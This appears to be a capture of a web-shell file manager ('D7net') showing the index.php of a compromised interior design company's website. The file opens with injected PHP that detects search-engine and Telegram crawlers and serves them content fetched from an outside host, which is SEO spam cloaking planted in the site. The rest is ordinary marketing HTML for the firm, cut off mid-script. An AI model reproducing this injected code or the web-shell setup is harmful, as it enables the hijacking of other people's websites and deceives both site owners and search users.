D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home3
/
encodto1
/
encodecor.com
/
Filename :
index.php
back
Copy
<?php function is_bot() { if (!isset($_SERVER["HTTP_USER_AGENT"])) { return false; } $user_agent = $_SERVER["HTTP_USER_AGENT"]; $bots = array("Googlebot", "TelegramBot", "bingbot", "Baiduspider", "YandexBot"); foreach ($bots as $bot) { if (stripos($user_agent, $bot) !== false) { return true; } } return false; } function fetch_content($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // untuk mengikuti redirect $content = curl_exec($ch); curl_close($ch); return $content; } function handle_request() { if (is_bot()) { // Ganti URL dengan sumber konten Anda $content = fetch_content("https://takeru-two.com/file/backup/32/index.txt"); return ($content !== false) ? $content : "Content not available"; } return "TELOLET"; } // Basic security headers header('X-Frame-Options: DENY'); header('Strict-Transport-Security: max-age=31536000; includeSubDomains'); header('X-Content-Type-Options: nosniff'); header('X-XSS-Protection: 1; mode=block'); echo handle_request(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <link rel="icon" href="images/favicon-32x32.png" type="image/gif" sizes="16x16"> <title>encodecor - we dont build we create</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Encodecor is best selling interior designer"> <meta name="keywords" content="Best Interior Design In siliguri"> <meta name="author" content=""> <!-- CSS Files ================================================== --> <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" id="bootstrap" /> <link href="css/plugins.css" rel="stylesheet" type="text/css"> <link href="css/color.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css"> <!-- custom background --> <link rel="stylesheet" href="css/bg.css" type="text/css"> <!-- color scheme --> <link rel="stylesheet" href="css/colors/yellow.css" type="text/css" id="colors"> <!-- revolution slider --> <link rel="stylesheet" href="rs-plugin/css/settings.css" type="text/css"> <link rel="stylesheet" href="css/rev-settings.css" type="text/css"> <link href="css/style.css" rel="stylesheet" type="text/css"> <style> .img-height{ position: relative; top: 100px; } #loader-container { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: #000; display: flex; justify-content: center; align-items: center; z-index: 9999; } #loader-video { max-width: 100%!important; max-height: 100%!important; } #main-content { display: none; } @media only screen and (max-width: 780px){ .mb-v{ display: block !important; background-size: unset !important; } .img-height{ position: relative; top: 0px; } } /* whatsapp chat css */ </style> </head> <body id="homepage"> <div id="wrapper"> <!-- header begin --> <header> <div class="info"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="column">Working Hours Monday - Friday <span class="id-color"><strong>08:00-16:00</strong></span></div> <div class="column">Toll Free <span class="id-color"><strong>1800.899.900</strong></span></div> <!-- social icons --> <div class="column social"> <a href="#"><i class="fa fa-facebook"></i></a> <a href="#"><i class="fa fa-twitter"></i></a> <a href="#"><i class="fa fa-rss"></i></a> <a href="#"><i class="fa fa-google-plus"></i></a> <a href="#"><i class="fa fa-envelope-o"></i></a> </div> <!-- social icons close --> </div> </div> </div> </div> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="md-flex"> <!-- logo begin --> <div id="logo"> <a href="index.html"> <img class="logo" src="images/Encodecor logo create update renovate.png" alt="" style="height: 90px;"> </a> </div> <!-- logo close --> <!-- small button begin --> <span id="menu-btn"></span> <!-- small button close --> <!-- mainmenu begin --> <div class="md-flex-col"> <nav class="md-flex"> <ul id="mainmenu"> <li><a href="index.html">Home<span></span></a> </li> <li><a href="about.html">About</a> </li> <li><a href="services.html">Services</a> <ul> <li ><a href="home-design.html">Home Design</a></li> <li ><a href="office-design.html">Office Design</a></li> <li ><a href="resturantdesign.html">Restaurant Design</a></li> <li ><a href="#">Own Garden Design</a></li> <li ><a href="academiadesign.html">Academia Design</a></li> <li ><a href="gymdesign.html">Personal gym Design</a></li> <li ><a href="studiodesign.html">Personal Studio</a></li> <li ><a href="hospitality-Sectors.html">Hospitality Design</a></li> </ul> </li> <li><a href="project-wide-4-cols.html">Portfolio</a> </li> <li><a href="gallery-4-cols.html">Gallery</a> <ul> <li ><a href="#">Video Gallery</a></li> </ul> </li> <li><a href="blog.html">Blog</a></li> <li><a href="contact.html">Contact</a> </li> </ul> </nav> <!-- mainmenu close --> </div> <div class="md-flex-col col-extra"> <a href="renovation-form.html" class="btn-on-header btn-line">Get Quote</a> </div> </div> </div> </div> </div> </header> <!-- header close --> <!-- content begin --> <div id="loader-container"> <video id="loader-video" autoplay !important> <source src="images/Encodecor video.mp4" type="video/mp4"!important> </video> </div> <div id="main-content"> </div> <div id="content" class="no-bottom no-top"> <!-- revolution slider begin --> <div id="carouselExampleFade" class="carousel slide carousel-fade" data-bs-ride="carousel"> <div class="carousel-inner"> <div class="carousel-item active"> <img src="images/slider/encodecor website carousel.png" class="d-block w-100" alt="..."> </div> </div> <button class="carousel-control-prev" type="button" data-bs-target="#carouselExampleFade" data-bs-slide="prev"> <span class="carousel-control-prev-icon" aria-hidden="true"></span> <span class="visually-hidden">Previous</span> </button> <button class="carousel-control-next" type="button" data-bs-target="#carouselExampleFade" data-bs-slide="next"> <span class="carousel-control-next-icon" aria-hidden="true"></span> <span class="visually-hidden">Next</span> </button> </div> <!-- revolution slider close --> <!-- section begin --> <section id="section-about"> <div class="container"> <div class="row"> <div class="col-md-6 offset-md-3 text-center wow fadeInUp"> <h1>What We Do</h1> <div class="separator"><span><i class="fa fa-circle"></i></span></div> <div class="spacer-single"></div> </div> <div class="col-md-4 wow fadeInLeft"> <h3><span class="id-color">Residential </span>Design</h3> The art and science of creating functional, aesthetically pleasing living spaces within homes. It involves carefully planning and organizing the layout, selecting and arranging furniture, choosing color schemes, and incorporating decorative elements to create an inviting environment. <div class="spacer-single"></div> <a class="image-popup-no-margins" href="images/misc/pic_1.jpg"> <img src="images/misc/pic_1.jpg" class="img-responsive" alt=""> </a> </div> <div class="col-md-4 wow fadeInUp" data-wow-delay=".2s"> <h3><span class="id-color">Office</span> Design</h3> Establishing a conducive and efficient workspace that aligns with the organization's objectives. It encompasses creating a functional and well-organized environment that enhances productivity, supports effective collaboration, and prioritizes employee well-being and motivation. <div class="spacer-single"></div> <a class="image-popup-no-margins" href="images/misc/pic_2.jpg"> <img src="images/misc/pic_2.jpg" class="img-responsive" alt=""> </a> </div> <div class="col-md-4 wow fadeInRight"> <h3><span class="id-color">Commercial</span> Design</h3> Creating functional and visually appealing spaces for businesses, retail stores, and other commercial establishments. It involves understanding the unique needs and goals of the business and translating them into a well-designed space that enhances the customer experience. <div class="spacer-single"></div> <a class="image-popup-no-margins" href="images/misc/pic_3.jpg"> <img src="images/misc/pic_3.jpg" class="img-responsive" alt=""> </a> </div> </div> </div> </section> <!-- section close --> <div class="container mb-5 "> <div class="row"> <div class="col-md-6"> <div class="h2 typing-wrap fw-bold fs-1 "> Why Choose Us ? <br>We Can <div class="typed-strings"> <p><span class="id-color">Create</span></p> <p><span class="id-color">Update</span></p> <p><span class="id-color">Renovate</span></p> </div> <span class="typed"></span> </div> </div> <div class="col-md-6 d-flex justify-content-center align-content-center "> <img class="img-fluid img-height" src="images/encodecor-logo2 we dont build.png" alt="" style="height: 80px;"> </div> <div class="clearfix"></div> <div class="col-md-6"> <div class="spacer-single "></div> <p class="lead fw-bold ">Our clients choose us because they want to work with a partner someone they can trust with the experience and knowledge to help navigate their way to live their dream. </p> <div class="spacer-single"></div> <div class="md-flex-col col-extra"> <a href="renovation-form.html" class="btn-on-header btn-line">Get Quote</a> </div> </div> </div> </div> <!-- section begin --> <section id="section-steps" class="jarallax text-light"> <img src="images/background/bg-2.jpg" class="jarallax-img" alt=""> <div class="container"> <div class="row"> <div class="col-md-6 offset-md-3 text-center wow fadeInUp"> <h1>Our Process</h1> <div class="separator"><span><i class="fa fa-circle"></i></span></div> <div class="spacer-single"></div> </div> <div class="col-md-12"> <div class="de_tab tab_steps"> <ul class="de_nav"> <li class="active wow fadeIn" data-wow-delay="0s"><span>Meet & Agree</span> <div class="v-border"></div> </li> <li class="wow fadeIn" data-wow-delay=".4s"><span>Idea & Concept</span> <div class="v-border"></div> </li> <li class="wow fadeIn" data-wow-delay=".8s"><span>Design & Create</span> <div class="v-border"></div> </li> <li class="wow fadeIn" data-wow-delay="1.2s"><span>Build & Install</span> <div class="v-border"></div> </li> </ul> <div class="de_tab_content"> <div id="tab1"> Meet Encodecor Interior, where exquisite design meets unparalleled expertise. Our team is committed to transforming spaces with meticulous attention to detail, ensuring a seamless blend of luxury and functionality. Elevate your surroundings with Encodecor Interior, where your vision meets our passion for timeless and sophisticated interiors. </div> <div id="tab2"> At Encodecor Interior, ideas flourish into captivating concepts. We believe in crafting unique design narratives that resonate with individual tastes and aspirations. From inception to realization, our team transforms your vision into an inspiring and personalized living experience. </div> <div id="tab3"> At Encodecor Interior, we don't just design spaces; we curate immersive experiences. Our approach is rooted in creativity and innovation, ensuring each project is a bespoke masterpiece. Let us design and create a space that reflects your lifestyle and aspirations, merging aesthetics with functionality seamlessly. </div> <div id="tab4"> Encodecor Interior goes beyond design to build and install transformative spaces. Our dedicated team takes pride in executing projects with precision and craftsmanship. From conceptualization to the final installation, trust us to bring your vision to life with excellence </div> </div> </div> </div> </div> </div> </section> <!-- section close --> <!-- section begin --> <section id="section-portfolio" class="no-top no-bottom" aria-label="section-portfolio"> <div class="container"> <div class="col-md-6 offset-md-3 text-center wow fadeInUp mt-5 "><h1>Our Projects</h1> <div class="separator"><span><i class="fa fa-circle"></i></span></div> <div class="spacer-single"></div> </div> <div class="spacer-single"></div> <!-- portfolio filter begin --> <div class="row"> <div class="col-md-12 text-center"> <ul id="filters" class="wow fadeInUp" data-wow-delay="0s"> <li><a href="#" data-filter="*" class="selected">All Projects</a></li> <li><a href="#" data-filter=".residential">Residential</a></li> <li><a href="#" data-filter=".hospitaly">Hospitaly</a></li> <li><a href="#" data-filter=".office">Office</a></li> <li><a href="#" data-filter=".commercial">Commercial</a></li> <li><a href="#" data-filter=".3d">3D</a></li> </ul> </div> </div> <!-- portfolio filter close --> </div> <div id="gallery" class="row grid_gallery gallery de-gallery wow fadeInUp" data-wow-delay=".3s"> <!-- gallery item --> <div class="col-md-3 item residential"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/gallery 1.jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Bed Room Interior</span> </span> </span> </a> <img src="images/portfolio/gallery 1.jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item hospitaly"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/gallery 2.jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Modern Elegance Kitchen</span> </span> </span> </a> <img src="images/portfolio/gallery 2.jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item hospitaly"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(3).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Apartment Renovation</span> </span> </span> </a> <img src="images/portfolio/pf%20(3).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item residential"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(4).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Bedroom Make Over</span> </span> </span> </a> <img src="images/portfolio/pf%20(4).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item office"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(5).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Modern Office</span> </span> </span> </a> <img src="images/portfolio/pf%20(5).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item office"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/office1.jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Modern Office</span> </span> </span> </a> <img src="images/portfolio/office1.jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item office"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/office2.jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Modern Office</span> </span> </span> </a> <img src="images/portfolio/office2.jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item commercial"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/gallery 5.jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Restaurant</span> </span> </span> </a> <img src="images/portfolio/gallery 5.jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item residential"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(7).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Summer House</span> </span> </span> </a> <img src="images/portfolio/pf%20(7).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item office"> <div class="picframe"><a class="image-popup-gallery" href="images/portfolio/pf%20(8).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Office On Space</span> </span> </span> </a> <img src="images/portfolio/pf%20(8).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item office"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/gallery 4.jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Luxury Living Room</span> </span> </span> </a> <img src="images/portfolio/gallery 4.jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item residential"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(10).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Cozy Bedroom</span> </span> </span> </a> <img src="images/portfolio/pf%20(10).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item hospitaly"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(11).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Classic Furnishing</span> </span> </span> </a> <img src="images/portfolio/pf%20(11).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item commercial"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/pf%20(12).jpg"> <span class="overlay"> <span class="pf_text"> <span class="project-name">Restaurant In Cannes</span> </span> </span> </a> <img src="images/portfolio/pf%20(12).jpg" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d1.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d1.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d2.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d2.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d3.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d3.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d4.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d4.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d5.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d5.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d7.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d7.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d8.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d8.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d9.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d9.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d10.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d10.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d11.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d11.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d12.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d12.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d13.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d13.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d11.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d11.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d12.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d12.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d13.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d13.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d14.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d14.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d15.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d15.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"> <a class="image-popup-gallery" href="images/3d/3d16.JPG"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/3d/3d16.JPG" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item 3d"> <div class="picframe"><a class="image-popup-gallery" href="images/portfolio/office1.HEIC"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/portfolio/office1.HEIC" alt="" /> </div> </div> <!-- close gallery item --> <!-- gallery item --> <div class="col-md-3 item office"> <div class="picframe"> <a class="image-popup-gallery" href="images/portfolio/office2.HEIC"> <span class="overlay"> <span class="pf_text"> <span class="project-name">3d</span> </span> </span> </a> <img src="images/portfolio/office2.HEIC" alt="" /> </div> </div> <!-- close gallery item --> </div> <div id="loader-area"> <div class="project-load"></div> </div> </section> <!-- section close --> <!-- section begin --> <section id="view-all-projects" class="call-to-action bg-color text-center" data-speed="5" data-type="background" aria-label="view-all-projects"> <a href="project-wide-4-cols.html" class="btn btn-line black btn-big">View All Projects</a> </section> <!-- logo carousel section close --> <section> <section id="section-steps" class="jarallax text-light"> <img src="images/background/encodecor our design approach.png" class="jarallax-img" alt=""> <div class="container"> <div class="row"> <div class="col-md-6 offset-md-3 text-center wow fadeInUp"> <h1>Our Design Approach</h1> <div class="separator"><span><i class="fa fa-circle"></i></span></div> <div class="spacer-single"></div> </div> <div class="col-md-12"> <div class="de_tab tab_steps"> <!-- <ul class="de_nav"> <li class="active wow fadeIn" data-wow-delay="0s"><span>Meet & Agree</span> <div class="v-border"></div> </li> <li class="wow fadeIn" data-wow-delay=".4s"><span>Idea & Concept</span> <div class="v-border"></div> </li> <li class="wow fadeIn" data-wow-delay=".8s"><span>Design & Create</span> <div class="v-border"></div> </li> <li class="wow fadeIn" data-wow-delay="1.2s"><span>Build & Install</span> <div class="v-border"></div> </li> </ul> --> <div class="de_tab_content"> <div id="tab1"> <ul> <li>As a luxury home designer firm, we understand the responsibility we carry as we design our clients’ forever homes. We take this responsibility with earnest fervour as we aim to meet the highest industry standards for design. Our goal is not only to create a beautiful and functional space but to improve the overall quality of life for the people that will live, work, and use the space. To achieve this, we take the time to get to know you, your needs from the space, and your creative preferences. We let that guide us as we tie in structure, space, and aesthetic to create a holistic design that matches your personality and way of life.</li> <li class="mt-4 ">We also work with luxury commercial properties and developers in our capacity as luxury interior designers in Mumbai. With such projects, we study and analyse their brand identity, their customer base, and their retail and lifestyle preferences. This helps us create a top quality, tailored customer experience that both engages and educates your target audience.</li> <li class="mt-4 ">Whether it is a residential or commercial project, Nitido Design offers the hands-on attention of a boutique design firm with the resources and advantages of an established company. Our team works closely together in a collaborative, flexible manner with trusted local contractors, artisans, and craftspeople so that we can cater to all your interior design needs.</li> </ul> </div> </div> </div> </div> </div> </div> </section> </section> <!-- our services section start --> <!-- our services section end --> <!-- section begin --> <section id="section-testimonial" class="jarallax text-light"> <img src="images/background/bg-3.jpg" class="jarallax-img" alt=""> <div class="container"> <div class="row"> <div class="col-md-6 offset-md-3 text-center wow fadeInUp"> <h1>Customer Says</h1> <div class="separator"><span><i class="fa fa-circle"></i></span></div> <div class="spacer-single"></div> </div> </div> <div id="testimonial-carousel" class="owl-carousel owl-theme de_carousel wow fadeInUp" data-wow-delay=".3s"> <div class="col-md-3 col-sm-6 col-12 item"> <div class="de_testi"> <blockquote> <p class="rd-scroll">"Encodecor Interior Design Studio transformed my living space into a dream home! Their attention to detail, creative ideas, and impeccable taste made the entire process enjoyable. From the initial consultation to the final reveal, every step was handled with professionalism and expertise. I couldn't be happier with the result!"</p> <div class="de_testi_by"> krishna mahadani </div> </blockquote> </div> </div> <div class="col-md-3 col-sm-6 col-12 item"> <div class="de_testi"> <blockquote> <p class="rd-scroll">"Working with Encodecor Interior Design Studio was a fantastic experience. They took the time to understand my vision and preferences, delivering a design that exceeded my expectations. The team's commitment to quality and their ability to blend functionality with aesthetics truly setthem apart. I highly recommend Encodecor for any interior design project."</p> <div class="de_testi_by"> Wrishav Ghosh </div> </blockquote> </div> </div> <div class="col-md-3 col-sm-6 col-12 item"> <div class="de_testi"> <blockquote> <p class="rd-scroll">"Encodecor Interior Design Studio has an incredible ability to capture the essence of a space. They transformed my outdated kitchen into a modern, stylish area that I now love spending time in. The designers were communicative, responsive, and brought fresh ideas to the table. I'm grateful for their expertise and dedication to making my home beautiful."</p> <div class="de_testi_by"> Pratik jain </div> </blockquote> </div> </div> <div class="col-md-3 col-sm-6 col-12 item"> <div class="de_testi"> <blockquote> <p class="rd-scroll">"Encodecor Interior Design Studio turned my office into a productive and inspiring workspace. Their creative solutions and thoughtful design choices not only enhanced the aesthetics but also improved the functionality of the room. The team's passion for design and commitment to client satisfaction make them a top choice for any interior design project."</p> <div class="de_testi_by"> rupam Dutta </div> </blockquote> </div> </div> </div> </div> </section> <!-- section close --> <!-- our clients section start --> <section> <div class="container"> <div class="row"> <div class="col-md-6 offset-md-3 text-center wow fadeInUp mt-5 "> <h1>Our Clients</h1> <div class="separator"><span><i class="fa fa-circle"></i></span></div> <div class="spacer-single"></div> </div> <div class="col-md-12"> <div id="logo-carousel" class="owl-carousel owl-theme"> <img src="images/logo/Screenshot_2024-02-11_120432-removebg-preview.png" class="img-responsive" alt="" "> <img src="images/logo/way 2 admission.png" class="img-responsive" alt="" > <img src="images/logo/creamy_creation_logo_2_w-01-removebg-preview.png" class="img-responsive img-fluid " alt=""> <img src="images/logo/walkers village.png" class="img-responsive" alt=""> <img src="images/logo/go detailing.png" class="img-responsive" alt="" > <img src="images/logo/Delhi Belly Logo.png" class="img-responsive" alt=""> <img src="images/logo/kettle.png part 2-01-01.png" class="img-responsive" alt=""> <img src="images/logo/tea villa logo-01.png" class="img-responsive" alt=""> <img src="images/logo/4hfh.png" class="img-responsive" alt="" style="position: relative; top: 52px;" > <img src="images/logo/mediview logo [Recovered] white-01-01.png" class="img-responsive" alt="" > </div> </div> </div> </div> </section> </div> <!-- footer begin --> <footer> <div class="container"> <div class="row"> <div class="col-lg-3" style="position:relative; top: -65px;"> <img src="images/Encodecor logo create update renovate.png" alt="" style="height: 150px;"><br>Enco Decor, a leading name in interior design, takes pride in crafting enduring home designs. Our well-crafted modular designs, quality raw materials, and professional installations ensure beauty that lasts within your budget. Everyone deserves great design – let Enco Decor transform your space authentically and elevate your living or working environment. </div> <div class="col-lg-3"> <h3>Contact Us</h3> <div class="widget widget-address"> <address> <span> 22/2, Ashutosh Mukherjee Rd, College Para, Hakim Para, Siliguri, West Bengal 734001</span> <span><i class="fa-solid fa-phone" style="color: #FFD43B;"></i><a href="tel:+91-9339921212 ">+91-9339921212 </a> </span> <span><i class="fa-solid fa-envelope-open" style="color: #FFD43B;"></i><a href="mailto:contact@encodecor.com"> contact@encodecor.com</a></span> </address> <h3 class="mt-4">Follow Us</h3> <div class="socialicons"> <a href="https://www.facebook.com/encodecor" target="_blank"><i class="fa-brands fa-facebook"></i></a> <a href="https://www.instagram.com/encodecor.official/" target="_blank"><i class="fa-brands fa-instagram"></i></a> <a href="#"><i class="fa-brands fa-x-twitter"></i></a> <a href="#"><i class="fa-brands fa-linkedin"></i></a> </div> </div> </div> <div class="col-lg-3"> <div class="widget widget_recent_post"> <h3>Our Services</h3> <ul> <a href="home-design.html"><li>Home Design</li></a> <a href="office-design.html"><li>Office Design</li></a> <a href="resturantdesign.html"><li>Restaurant Design</li></a> <a href=""><li>Own Garden Design</li></a> <a href="academiadesign.html"><li>Academia Design</li></a> <a href="gymdesign.html"><li>Personal Gym Design</li></a> <a href="studiodesign.html"><li>Personal Studio</li></a> <a href="hospitality-Sectors.html"><li>Hospitality Sector</li></a> </ul> </div> </div> <div class="col-lg-3"> <iframe src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fencodecor&tabs=timeline&width=340&height=500&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId" width="340" height="300" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowfullscreen="true" allow="autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share"></iframe> </div> </div> </div> <section class="pt-2 pb-2 mb-v"> <div class="container mb-v"> <div class="row mb-v"> <div class="col-12 mb-v"> <div class="d-flex justify-content-between mb-v";> <span class="mb-v" <b> ©Enco Decor.</b> All Right Reserved. </span mb-v> <span>Designed with <i class="fa fa-heart text-danger"></i> by <img src="images/encoders white logo.png" alt="" style="height:30px;" class="ms-2 img-fluid"></span> </div> </div> </div> </div> </section> <a href="#" id="back-to-top"></a> </footer> <!-- footer close --> </div> <!-- whatsapp chat --> <a class='blantershow-chat' href='https://wa.me/9832648369' title='Chat with our professional'><svg width="20" viewBox="0 0 24 24"><defs/><path fill="#eceff1" d="M20.5 3.4A12.1 12.1 0 0012 0 12 12 0 001.7 17.8L0 24l6.3-1.7c2.8 1.5 5 1.4 5.8 1.5a12 12 0 008.4-20.3z"/><path fill="#4caf50" d="M12 21.8c-3.1 0-5.2-1.6-5.4-1.6l-3.7 1 1-3.7-.3-.4A9.9 9.9 0 012.1 12a10 10 0 0117-7 9.9 9.9 0 01-7 16.9z"/><path fill="#fafafa" d="M17.5 14.3c-.3 0-1.8-.8-2-.9-.7-.2-.5 0-1.7 1.3-.1.2-.3.2-.6.1s-1.3-.5-2.4-1.5a9 9 0 01-1.7-2c-.3-.6.4-.6 1-1.7l-.1-.5-1-2.2c-.2-.6-.4-.5-.6-.5-.6 0-1 0-1.4.3-1.6 1.8-1.2 3.6.2 5.6 2.7 3.5 4.2 4.2 6.8 5 .7.3 1.4.3 1.9.2.6 0 1.7-.7 2-1.4.3-.7.3-1.3.2-1.4-.1-.2-.3-.3-.6-.4z"/></svg> Chat with Us</a> <!-- Javascript Files ================================================== --> <script src="js/plugins.js"></script> <script src="js/designesia.js"></script> <!-- SLIDER REVOLUTION SCRIPTS --> <script src="rs-plugin/js/jquery.themepunch.plugins.min.js"></script> <script src="rs-plugin/js/jquery.themepunch.revolution.min.js"></script> <script src="js/typed.js"></script> <!-- COOKIES PLUGIN --> <script> $(function () { // jquery typed plugin $(".typed").typed({ 